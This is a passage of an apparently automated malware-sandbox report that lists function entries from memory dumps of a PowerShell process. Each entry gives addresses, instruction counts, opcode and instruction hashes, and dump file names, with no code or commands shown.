                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3838db68a2e763760e8666c59b8d6320624c8bdf850b6f6382272a2a24ec484f
                                                                                                      • Instruction ID: c172223f79def0680a02ec0ef99913958eb425caec7c6b0b16ee8b798315164d
                                                                                                      • Opcode Fuzzy Hash: 3838db68a2e763760e8666c59b8d6320624c8bdf850b6f6382272a2a24ec484f
                                                                                                      • Instruction Fuzzy Hash: 563175B4E001099FEB04EFA4D554BBEB7B2EF84304F118469CA15AB394DA35AD428F90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04A6F3D8 Relevance: .1, Instructions: 76COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1711694651.0000000004A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A6D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4a6d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1c61bfd802bc96a61c7d36676d14a2ce2cee18934edfe8a2894234248cc85914
                                                                                                      • Instruction ID: d73659a21ccb62a261dba963f2ac368f24e2407a63b3a274687df5aeab635d7b
                                                                                                      • Opcode Fuzzy Hash: 1c61bfd802bc96a61c7d36676d14a2ce2cee18934edfe8a2894234248cc85914
                                                                                                      • Instruction Fuzzy Hash: C321F475604200EFCB05DF14E9C8B26BF75FB88314F24C5A9ED0A4A656C736E456CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07902700 Relevance: .1, Instructions: 76COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d206ed47df0a4bae0edb04c0239c0b830734f4a1a091dabf42c601450fa013e4
                                                                                                      • Instruction ID: 816f61f702d5e717e5ed29707d160924d87457be5603c65e98ec4368b6c794b2
                                                                                                      • Opcode Fuzzy Hash: d206ed47df0a4bae0edb04c0239c0b830734f4a1a091dabf42c601450fa013e4
                                                                                                      • Instruction Fuzzy Hash: 7E219FB5A20206DFDB20CF59C54CB69B7E9BB45319F14806AD908DB390C774E984CBE1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F593F0 Relevance: .1, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a167c3144a7808347fb5e7d71d11652a46a6a191eb0b3c27ad50ca3e2f9edb2a
                                                                                                      • Instruction ID: 6b86bcf7274e159a72b208f78a2cf1b4c0d38ed0542d9ec7e9275b766b5ef5b3
                                                                                                      • Opcode Fuzzy Hash: a167c3144a7808347fb5e7d71d11652a46a6a191eb0b3c27ad50ca3e2f9edb2a
                                                                                                      • Instruction Fuzzy Hash: C5319CB1901344CFDB64CF6AC08878AFFE6EB89310F28C05EC94D9B225C6B46482CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04A6F02C Relevance: .1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1711694651.0000000004A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A6D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4a6d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05f589e646923b2ed5836fd4946400e320c12d5025016c244e7d0248016edb07
                                                                                                      • Instruction ID: be50e67c8d954ff86ce4768fdf1a1b69d1a49f47da74109642db54346ee8a8d1
                                                                                                      • Opcode Fuzzy Hash: 05f589e646923b2ed5836fd4946400e320c12d5025016c244e7d0248016edb07
                                                                                                      • Instruction Fuzzy Hash: 35214671604200DFEB10DF24E9C0B26BFA5FB88314F20C56DEA0A4B256E33AE446CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F59400 Relevance: .1, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 14b913e2431516066862c0cea316968c5849d1622d9a1532214faa29368f871b
                                                                                                      • Instruction ID: c73bf4b0f3ebbd8bf25189e44e06e9878e413a3b5c72ce8edb4f437ee2af8efd
                                                                                                      • Opcode Fuzzy Hash: 14b913e2431516066862c0cea316968c5849d1622d9a1532214faa29368f871b
                                                                                                      • Instruction Fuzzy Hash: 6E2159B1E01744CEDB64CF6AC48878AFBF6EB89310F28C41AD94D97255D6B468828B61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5767C Relevance: .1, Instructions: 62COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c94713976498c501079cd65b1a33141450767b5d84460c9a7b474600ac2ced59
                                                                                                      • Instruction ID: 92502f777410f5515f77281da76f8fb083c4c3c67b44cc8b667c981ea1fdf7e7
                                                                                                      • Opcode Fuzzy Hash: c94713976498c501079cd65b1a33141450767b5d84460c9a7b474600ac2ced59
                                                                                                      • Instruction Fuzzy Hash: 4411FE76B001188FCF04DBA8E9409DD77F6EBC8225B0540A5E909EB325DB35ED168BA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04A6F3D3 Relevance: .1, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1711694651.0000000004A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A6D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4a6d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                      • Instruction ID: 460a4758c7c308b12a69937ecda393ecdcd378874b915a007cd9a4061c111a2f
                                                                                                      • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                      • Instruction Fuzzy Hash: 9C219D76504240DFCF06CF14D9C4B16BF72FB88314F24C5A9ED4A4A656C33AD46ACB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5E318 Relevance: .1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ae9e18906186d1e4d9617f774dbd225dfec07dd301e1093f44b6bfbb5f88bcba
                                                                                                      • Instruction ID: 2d24087dcf8f81ee177ee841ece4cb7f1d3e1de3f1274028e1ab413624a99bea
                                                                                                      • Opcode Fuzzy Hash: ae9e18906186d1e4d9617f774dbd225dfec07dd301e1093f44b6bfbb5f88bcba
                                                                                                      • Instruction Fuzzy Hash: 96116771905309CFDB10CF99C644BAABFF4EB49310F24806AD958AB251D339A645CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04A6F027 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1711694651.0000000004A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A6D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4a6d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                      • Instruction ID: 13ab24f13d554e01ecb183227cf9bc1993f6f30c43466cac83ba53e3a821de7f
                                                                                                      • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                      • Instruction Fuzzy Hash: 7411DD75504280CFDB11CF14E5C4B15BFA1FB84328F28C6AAE90A4B656C33AE44ACB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5E328 Relevance: .1, Instructions: 51COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1360abb246b817cb09b03b9cc3808e82bb37ee021fea578ff005e5e2eae23102
                                                                                                      • Instruction ID: d16412fe69c1bc11c46c76bed02dd590e57abdd63223900cf9c60f9e05c5df64
                                                                                                      • Opcode Fuzzy Hash: 1360abb246b817cb09b03b9cc3808e82bb37ee021fea578ff005e5e2eae23102
                                                                                                      • Instruction Fuzzy Hash: 83113AB1901349CFDB10CF9AC544B9EBFF4EB48314F24806DD548A7251D739A645CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F52C5C Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a2146f988269d4a531e2d7c622f947ae0d6307b7b96e65ae73b818114e522557
                                                                                                      • Instruction ID: 2a30c1008a18980f5b70b8bc05c47fd99144d99eb90bedf43bc2da20e8d921b4
                                                                                                      • Opcode Fuzzy Hash: a2146f988269d4a531e2d7c622f947ae0d6307b7b96e65ae73b818114e522557
                                                                                                      • Instruction Fuzzy Hash: 1F110C346092909FCB03CF6CD9A05E9BF70EF4A320B1542C6D4559F273C325E946CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5BCE0 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 85037ef59a2765c74b7b03f148bc0332c325d75ecfe368700c85fefee6558839
                                                                                                      • Instruction ID: 5700b65fdbbb934ed10c7f06492dfcf4663dcd319897352055069f1029262d85
                                                                                                      • Opcode Fuzzy Hash: 85037ef59a2765c74b7b03f148bc0332c325d75ecfe368700c85fefee6558839
                                                                                                      • Instruction Fuzzy Hash: 6E01C0316083449FD718DF79D598A6A7FE4EF45210B1584EEE48EC76B2CA31F846C700
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5DCE8 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 737e815ff2f90769dfaf9b6fe8476be67695c496c08c87afc0c1c4cd4d903fa7
                                                                                                      • Instruction ID: 9b8eacdaf8da696ff5d655da429db915b4ee6afa99c3056a7b1072d5ae5ceb7a
                                                                                                      • Opcode Fuzzy Hash: 737e815ff2f90769dfaf9b6fe8476be67695c496c08c87afc0c1c4cd4d903fa7
                                                                                                      • Instruction Fuzzy Hash: C0110535204750CFC728DF79D08086ABBF6EF8921532489ADD48A8B7A0DB36F942CB50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5DF20 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 38a5a27e06b7d534f20ec8fd18e34493dd4575cc6d3164bc30163cd5fe0c995e
                                                                                                      • Instruction ID: 614d5957593381e322c6c6e57681895236862edb293b37252951027cff6a6206
                                                                                                      • Opcode Fuzzy Hash: 38a5a27e06b7d534f20ec8fd18e34493dd4575cc6d3164bc30163cd5fe0c995e
                                                                                                      • Instruction Fuzzy Hash: E3018C35B01214DFCB119FB4E848AAEBBF6FB88215F10416DE91ED3242DB32A901CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04A6D01D Relevance: .0, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1711694651.0000000004A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A6D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4a6d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 45c0902e83a51ae9647eb0bc2583fa535ecd7b7467a398a5211276a10c0f5586
                                                                                                      • Instruction ID: b51cc50f24bb2d59f594c91b3e3a48efa78fcac49dc926814124d454d261b280
                                                                                                      • Opcode Fuzzy Hash: 45c0902e83a51ae9647eb0bc2583fa535ecd7b7467a398a5211276a10c0f5586
                                                                                                      • Instruction Fuzzy Hash: 7201F7316083409AF7104F25D984767BFA8DF413A4F18C42AEC4B0B146C279A845C6B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04A6D007 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1711694651.0000000004A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A6D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4a6d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08c5d6cabee240a009feb291906c78a76a0097ff9cddf0b0138961a3c3633f85
                                                                                                      • Instruction ID: 89286a7662474ff4045831bf24fa90b3c7402f94a9e7d5e448d52168f206d221
                                                                                                      • Opcode Fuzzy Hash: 08c5d6cabee240a009feb291906c78a76a0097ff9cddf0b0138961a3c3633f85
                                                                                                      • Instruction Fuzzy Hash: 2401717150E3C09EE7128B259C94B52BFB4EF43224F1DC0DBD8898F1A3C2699849C772
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5BF10 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 306b045244e4daa694be876e5811fbcd2ef9cd859c74ce2fda72be0e951a184d
                                                                                                      • Instruction ID: 713f82530cfda249d914f0095ce4c6dc3241cff090d27b40091426a13f4c6dc4
                                                                                                      • Opcode Fuzzy Hash: 306b045244e4daa694be876e5811fbcd2ef9cd859c74ce2fda72be0e951a184d
                                                                                                      • Instruction Fuzzy Hash: AEF062327052645FD7048A6ADC94EB7BFEDEF8A611B15807AF945C73A1CA70DD00C660
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57958 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db29fe81d7711228c0d1b6d32ac4a2c389ab96387c4658335e97872c8568301c
                                                                                                      • Instruction ID: 4ff12bbb012899a11b55f164e9a3452a11ea03046eeb265a6b7af3af29c77ead
                                                                                                      • Opcode Fuzzy Hash: db29fe81d7711228c0d1b6d32ac4a2c389ab96387c4658335e97872c8568301c
                                                                                                      • Instruction Fuzzy Hash: CFF08B31704340AFD701A7659C0496F7BE9DF89621B00066EE60AC3362CE30AC4283B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5F7C1 Relevance: .0, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3bc401573ae2771f8de49506e6fcdf22e6ed9a7f40c77f470b1089a6bbd64906
                                                                                                      • Instruction ID: 7963d4ef67ec31cba8abfc331c8d4da83e7481e55f657f0f4146f1debf304a5d
                                                                                                      • Opcode Fuzzy Hash: 3bc401573ae2771f8de49506e6fcdf22e6ed9a7f40c77f470b1089a6bbd64906
                                                                                                      • Instruction Fuzzy Hash: FA01E571D0074ADFCB44DFE4C9446ADBBB4FF99300F20572AE005AB650EBB06596CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04A6D9A7 Relevance: .0, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1711694651.0000000004A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A6D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4a6d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d4a2927a31d85be7162e78e6c284fed2ddde16cfc90e3899dbbda093da6387ac
                                                                                                      • Instruction ID: 8be8382978ce860afe0305ea2a72439a70c875054cd8f5ad2d4ee3049c7cca51
                                                                                                      • Opcode Fuzzy Hash: d4a2927a31d85be7162e78e6c284fed2ddde16cfc90e3899dbbda093da6387ac
                                                                                                      • Instruction Fuzzy Hash: D1F0F976600614AF9720CF0AD985C23FBADEFD4770719C56AE84A8B611C671FC41CEA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F590D8 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e302c44b67f6ebc0939531ce46564a326f016e9a8764302c116f982078ae7dda
                                                                                                      • Instruction ID: c218d57702cfec5e87439b30fe0482a30f949f8fa4a08ec51d474a719481068e
                                                                                                      • Opcode Fuzzy Hash: e302c44b67f6ebc0939531ce46564a326f016e9a8764302c116f982078ae7dda
                                                                                                      • Instruction Fuzzy Hash: 40F0F6316001049BEB18AF69C0587ABBB96DFC235DF11412ACE0A4B391CE393C42CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5DEC1 Relevance: .0, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e74b828f62680b18f89f43123e7a14ec84d34ce9f69528a3b9f9e2edf8465c95
                                                                                                      • Instruction ID: 9940aa53c156d651c11c97287c15c25cf4695a8aed1f6ebd651d83a47818fecd
                                                                                                      • Opcode Fuzzy Hash: e74b828f62680b18f89f43123e7a14ec84d34ce9f69528a3b9f9e2edf8465c95
                                                                                                      • Instruction Fuzzy Hash: 83F058353001018FC708AE1DD498D26BBEAEFCA711B2640AAE546DF370CA70EC02CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5F7D0 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5cb5a8a330c1e230e0f10e916ce9960d2002c2cd816426493c24ae03943db747
                                                                                                      • Instruction ID: 93f18f3d503f1b9e944726197a7742a50ba95fd333e49405938e63519bcd2bd4
                                                                                                      • Opcode Fuzzy Hash: 5cb5a8a330c1e230e0f10e916ce9960d2002c2cd816426493c24ae03943db747
                                                                                                      • Instruction Fuzzy Hash: C201F671D0075AEBCB44CFE4C8446EDFBB1FF99300F24472AE005A6600EBB06686CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57968 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fa3777daf3e90cb6be493d7d34d097726f4474c8b420fd6399c3f51fe8f9568e
                                                                                                      • Instruction ID: d960800e196a9e93971f4e05b9bd65826aa7f7ea75d9ef261e52f1d9e124e1c2
                                                                                                      • Opcode Fuzzy Hash: fa3777daf3e90cb6be493d7d34d097726f4474c8b420fd6399c3f51fe8f9568e
                                                                                                      • Instruction Fuzzy Hash: A0F0A0317006149FDB10AA6AE844A6FB7EAEB88665B00052DE61EC3354DF70AC4687B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04A6D998 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1711694651.0000000004A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A6D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4a6d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2ef49dd6c228c3d9b711875eb661a43b8e9ce66a346517704cb97e943047f6a1
                                                                                                      • Instruction ID: 9eaa4f0aaa4891ee205acb94b2532b6043e970a63ac770effcd14c063f1e654d
                                                                                                      • Opcode Fuzzy Hash: 2ef49dd6c228c3d9b711875eb661a43b8e9ce66a346517704cb97e943047f6a1
                                                                                                      • Instruction Fuzzy Hash: 99F0F976204A80AFD725CF06C985D23BBB9EB85664B198499E84A9B712C631FC42CF60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57697 Relevance: .0, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7344b455508e5d458c83fccdd6f2047a0b89dbbb2b2ecf9aa39981e991521787
                                                                                                      • Instruction ID: 52be131d4ed9f6aae0cbf1fe7d2bd42f063ee07619899a3f6a82d14087d1c856
                                                                                                      • Opcode Fuzzy Hash: 7344b455508e5d458c83fccdd6f2047a0b89dbbb2b2ecf9aa39981e991521787
                                                                                                      • Instruction Fuzzy Hash: 5FF0A0397001048FCF00EB6CE940A9A7BE6EBC8251B058165EA09CB328DF34EC038BA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F590E8 Relevance: .0, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3763f3cfedf67d3390045df17aa27cc4b63f100fd7c652d01fc174821e0a2726
                                                                                                      • Instruction ID: d17fd07a3a6df3ddf3b2c62ab4d9bfb3c3018293091b3bf18ae1b032782cc7b8
                                                                                                      • Opcode Fuzzy Hash: 3763f3cfedf67d3390045df17aa27cc4b63f100fd7c652d01fc174821e0a2726
                                                                                                      • Instruction Fuzzy Hash: 98F0E2316001045BEB00AF65C0583ABB796DBC6329F10812ACD0A47384CE393C42CBE1
                                                                                                      Uniqueness

